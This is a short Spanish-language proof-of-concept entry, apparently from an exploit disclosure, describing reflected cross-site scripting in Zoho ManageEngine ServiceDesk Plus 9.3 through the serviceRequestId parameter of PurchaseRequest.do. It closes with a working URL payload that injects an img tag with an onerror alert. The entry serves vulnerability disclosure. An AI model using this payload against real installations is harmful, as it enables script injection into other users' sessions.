
Prueba de concepto de exploit XSS para Zoho ManageEngine ServiceDesk Plus 9.3 a través del parámetro serviceRequestId de PurchaseRequest.do, que demuestra una vulnerabilidad de cross-site scripting reflejado.
Información Descripción: Se descubrió un problema en Zoho ManageEngine ServiceDesk Plus 9.3. Hay XSS a través del parámetro serviceRequestId de PurchaseRequest.do.
Autor: Concobe de Tarantula Team - VinCSS (miembro de Vingroup)
domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=1%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E1